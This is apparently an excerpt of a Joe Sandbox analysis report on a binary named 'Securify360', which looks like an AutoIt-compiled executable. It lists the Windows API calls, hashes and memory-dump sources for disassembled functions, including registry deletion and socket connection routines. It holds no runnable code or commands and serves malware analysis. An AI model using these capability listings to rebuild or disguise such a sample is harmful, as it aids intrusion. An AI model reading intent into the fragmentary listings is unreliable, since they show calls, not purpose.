                                                                                              • Instruction ID: cfdb614a87516f21076505f569255e22fcdf3a26b2f279fa6727cce55c5f7e83
                                                                                              • Opcode Fuzzy Hash: fca86ce7ca20adf54e4a9525b48b132d10247fa5f250f348f423faeea23f6c4c
                                                                                              • Instruction Fuzzy Hash: 3A417B75A00308EFDB20DF58D884EAABBFAFF05310F048169F99597244C739A954CFA0
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01011631
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101165B
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 01011712
                                                                                                • Part of subcall function 01011602: RegCloseKey.ADVAPI32(?), ref: 01011678
                                                                                                • Part of subcall function 01011602: FreeLibrary.KERNEL32(?), ref: 010116CA
                                                                                                • Part of subcall function 01011602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010116ED
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 010116B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 395352322-0
                                                                                              • Opcode ID: 45b234abeb95ef1096e636eefdc03463b6e8a3019aaf10fb9c3dcffd2ecbdff6
                                                                                              • Instruction ID: eb3bc61c34a5af6a1312dc1dbf7d64d8787ee58c12d7e73770c8348a0cf7c101
                                                                                              • Opcode Fuzzy Hash: 45b234abeb95ef1096e636eefdc03463b6e8a3019aaf10fb9c3dcffd2ecbdff6
                                                                                              • Instruction Fuzzy Hash: 6B315271900209BFEB29CFA4D885EFFB7BCEF08300F1001A9F645E2244D7795A459BA4
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 01016911
                                                                                              • GetWindowLongW.USER32(014A52E0,000000F0), ref: 01016944
                                                                                              • GetWindowLongW.USER32(014A52E0,000000F0), ref: 01016979
                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 010169AB
                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 010169D5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 010169E6
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01016A00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: f95a71a9b89631103bfe103fff790303719b42d6b7831fb6d28b612519404fa9
                                                                                              • Instruction ID: 89c4df7b051dc1d2ab32f90a347093a01f2b457c5067efd0c6d156a6473a14cd
                                                                                              • Opcode Fuzzy Hash: f95a71a9b89631103bfe103fff790303719b42d6b7831fb6d28b612519404fa9
                                                                                              • Instruction Fuzzy Hash: 94311A356402559FDB31CF1CDC84FA537EAEB4A710F2501A4F6958F2AACBBBA840DB50
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE2CA
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE2F0
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00FEE2F3
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00FEE311
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00FEE31A
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00FEE33F
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00FEE34D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 5197366db8f705b01e40d185885c3b4b3c9fb9dfde3a91bea92ef0a7437375ea
                                                                                              • Instruction ID: b0e87c1590ca05435a7b45b489767cb587480a443431f5bcf9ebf398c4776864
                                                                                              • Opcode Fuzzy Hash: 5197366db8f705b01e40d185885c3b4b3c9fb9dfde3a91bea92ef0a7437375ea
                                                                                              • Instruction Fuzzy Hash: 4421D872A00209BF9F20DEA9DC88CBF77ACEB08360B148125F958DB254DA74EC459760
                                                                                              APIs
                                                                                                • Part of subcall function 01008475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010068B1
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 010068C0
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 010068F9
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 01006902
                                                                                              • WSAGetLastError.WSOCK32 ref: 0100690C
                                                                                              • closesocket.WSOCK32(00000000), ref: 01006935
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0100694E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 910771015-0
                                                                                              • Opcode ID: 2023f8154a0d28018d9cef254a30ff05283e63fded2118cb085585ffdb01b0bc
                                                                                              • Instruction ID: 44bc63d6d4b0edfebe3dcb0f8580f73d9b574723f8d76db59f491cb5d73a5074
                                                                                              • Opcode Fuzzy Hash: 2023f8154a0d28018d9cef254a30ff05283e63fded2118cb085585ffdb01b0bc
                                                                                              • Instruction Fuzzy Hash: 3331D571600204AFEF219F64CC84FBE77EEEB44725F044169FD85A72C4CB79A9158BA1
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE3A5
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE3CB
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00FEE3CE
                                                                                              • SysAllocString.OLEAUT32 ref: 00FEE3EF
                                                                                              • SysFreeString.OLEAUT32 ref: 00FEE3F8
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00FEE412
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00FEE420
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 1d9f3886d4881b600f64e50679ed3a8505f33d5195fbf41305275efba8bf31dc
                                                                                              • Instruction ID: 0ce1d2045cc10dc0dd2303317ba1d588a97107c1739162a0845acd35af404156
                                                                                              • Opcode Fuzzy Hash: 1d9f3886d4881b600f64e50679ed3a8505f33d5195fbf41305275efba8bf31dc
                                                                                              • Instruction Fuzzy Hash: 4D218876604244AFAB20DFA9EC88DBF77ECEB4C3607108125F945CB294DA75EC419B64
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: cbf28119c370d6d530ca521ab0ab2915e69a930728da7ec0ff4db95140d0d622
                                                                                              • Instruction ID: 62cae1610d2eb8b338339050b995bb7a6548d693cde09dee6d300b67ac4aab62
                                                                                              • Opcode Fuzzy Hash: cbf28119c370d6d530ca521ab0ab2915e69a930728da7ec0ff4db95140d0d622
                                                                                              • Instruction Fuzzy Hash: AB214C32500291A6D330BB279C02FE77398AF55750F50443AF4868B153EB99BD8AB395
                                                                                              APIs
                                                                                                • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                                                                • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                                                                • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01017C57
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01017C64
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01017C6F
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01017C7E
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01017C8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: e5101075e273006b403160d04dd5a64e017936bc713cbdeb67906715ac0082ab
                                                                                              • Instruction ID: 514ad9934171017ba9c75bcfaccaf1f64e693227240797a683a84220072b1af5
                                                                                              • Opcode Fuzzy Hash: e5101075e273006b403160d04dd5a64e017936bc713cbdeb67906715ac0082ab
                                                                                              • Instruction Fuzzy Hash: ED1190B214021DBFEF258E64CC85EEB7F6DEF08798F014114BB48A6054C6769C21DBA0
                                                                                              APIs
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FE0817,?,?,00000000,00000000), ref: 00FF9EE8
                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FE0817,?,?,00000000,00000000), ref: 00FF9EFF
                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00FE0817,?,?,00000000,00000000,?,?,?,?,?,?,00FA4A14), ref: 00FF9F0F
                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00FE0817,?,?,00000000,00000000,?,?,?,?,?,?,00FA4A14), ref: 00FF9F20
                                                                                              • LockResource.KERNEL32(00FE0817,?,?,00FE0817,?,?,00000000,00000000,?,?,?,?,?,?,00FA4A14,00000000), ref: 00FF9F2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                              • String ID: SCRIPT
                                                                                              • API String ID: 3051347437-3967369404
                                                                                              • Opcode ID: 88607a37a502553fdf9601973203710670c81b8cb026b547e272a4eb8d368a4e
                                                                                              • Instruction ID: 4be36a6d8adeb47da270e03530c8cca2d6e2fc4657c0bdbf59f6b0093b5b32fd
                                                                                              • Opcode Fuzzy Hash: 88607a37a502553fdf9601973203710670c81b8cb026b547e272a4eb8d368a4e
                                                                                              • Instruction Fuzzy Hash: 37114870604705ABE7308B25DC48F277BB9EFC5B11F204269F649D62A4DBB6E8049660
                                                                                              APIs
                                                                                              • __init_pointers.LIBCMT ref: 00FB9D16
                                                                                                • Part of subcall function 00FB33B7: EncodePointer.KERNEL32(00000000), ref: 00FB33BA
                                                                                                • Part of subcall function 00FB33B7: __initp_misc_winsig.LIBCMT ref: 00FB33D5
                                                                                                • Part of subcall function 00FB33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FBA0D0
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FBA0E4
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FBA0F7
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FBA10A
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FBA11D
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FBA130
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FBA143
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FBA156
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FBA169
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FBA17C
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FBA18F
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FBA1A2
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FBA1B5
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FBA1C8
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FBA1DB
                                                                                                • Part of subcall function 00FB33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FBA1EE
                                                                                              • __mtinitlocks.LIBCMT ref: 00FB9D1B
                                                                                              • __mtterm.LIBCMT ref: 00FB9D24
                                                                                                • Part of subcall function 00FB9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FB9D29,00FB7EFD,0104CD38,00000014), ref: 00FB9E86
                                                                                                • Part of subcall function 00FB9D8C: _free.LIBCMT ref: 00FB9E8D
                                                                                                • Part of subcall function 00FB9D8C: DeleteCriticalSection.KERNEL32(01050C00,?,?,00FB9D29,00FB7EFD,0104CD38,00000014), ref: 00FB9EAF
                                                                                              • __calloc_crt.LIBCMT ref: 00FB9D49
                                                                                              • __initptd.LIBCMT ref: 00FB9D6B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00FB9D72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                              • String ID:
                                                                                              • API String ID: 3567560977-0
                                                                                              • Opcode ID: 1e87ba4f9782d27d3aa08480bd2a936fb2bf063aec7f9c41d37ec230d1e8dc0b
                                                                                              • Instruction ID: 154aec6a24228d4d9586573a218687010d90ef8a42f5c6bdeec58ba082e34540
                                                                                              • Opcode Fuzzy Hash: 1e87ba4f9782d27d3aa08480bd2a936fb2bf063aec7f9c41d37ec230d1e8dc0b
                                                                                              • Instruction Fuzzy Hash: BBF0CD3290D3122AE7343A37BC032CA3AD8DB41770F204219F2E0C61CAEF9988016E90
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FB4282,?), ref: 00FB41D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FB41DA
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00FB41E6
                                                                                              • DecodePointer.KERNEL32(00000001,00FB4282,?), ref: 00FB4203
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoInitialize$combase.dll
                                                                                              • API String ID: 3489934621-340411864
                                                                                              • Opcode ID: ba35d07fb64a7fbea4c01cfb9f65469178c7bd36f4f2600cdef031acbc19700c
                                                                                              • Instruction ID: 96f85fb93ed88835904010faaa7293eebd25095a2aad70281567de9e20b3bbdf
                                                                                              • Opcode Fuzzy Hash: ba35d07fb64a7fbea4c01cfb9f65469178c7bd36f4f2600cdef031acbc19700c
                                                                                              • Instruction Fuzzy Hash: E2E0E570A90311AFDB302F75ED49B4A3A69B719B06F608428F4C1DA08CCBBF50849F08
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FB41A8), ref: 00FB42A8
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FB42AF
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 00FB42BA
                                                                                              • DecodePointer.KERNEL32(00FB41A8), ref: 00FB42D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                              • API String ID: 3489934621-2819208100
                                                                                              • Opcode ID: e724611346146a4c9f174b565ac784abd51a6e16b39c9a483663dbb835dac9c3
                                                                                              • Instruction ID: c8bfc80bb557a16bfa8c53070e4b87946cbdf3a86fcd55a321b037ab68afc2d4
                                                                                              • Opcode Fuzzy Hash: e724611346146a4c9f174b565ac784abd51a6e16b39c9a483663dbb835dac9c3
                                                                                              • Instruction Fuzzy Hash: A9E0B670A91300ABDB309F61AD0EB463E6CB704B16F604519F8C1D948CCBBF5504DB18
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 00F921B8
                                                                                              • GetWindowRect.USER32(?,?), ref: 00F921F9
                                                                                              • ScreenToClient.USER32(?,?), ref: 00F92221
                                                                                              • GetClientRect.USER32(?,?), ref: 00F92350
                                                                                              • GetWindowRect.USER32(?,?), ref: 00F92369
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                              • String ID:
                                                                                              • API String ID: 1296646539-0
                                                                                              • Opcode ID: 71c382d1b24b37662467d60e925897a814f019bda2ff190c59ac8119fb959a18
                                                                                              • Instruction ID: 77202379691eeeee6d5023a898ff954a78cff8734ee59ca26b69574cb31f6a75
                                                                                              • Opcode Fuzzy Hash: 71c382d1b24b37662467d60e925897a814f019bda2ff190c59ac8119fb959a18
                                                                                              • Instruction Fuzzy Hash: A3B1823990024AEBEF50CFA8C581BEDB7B1FF48710F148129ED59EB254DB34A950EB64
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3253778849-0
                                                                                              • Opcode ID: d5589003196242d504a5bcfb2fada58166f6cb3131bce6c7d0070af9e113e146
                                                                                              • Instruction ID: b60827033500fe301f3e86dab3d4c5315cadc5359c509c72b66862ab57524f6d
                                                                                              • Opcode Fuzzy Hash: d5589003196242d504a5bcfb2fada58166f6cb3131bce6c7d0070af9e113e146
                                                                                              • Instruction Fuzzy Hash: 5B61D13150025EABDF11EF60CC91EFE77A8BF05348F444559FA959B1A2DB38AC06EB50
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                                • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101091D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101095D
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01010980
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010109A9
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 010109EC
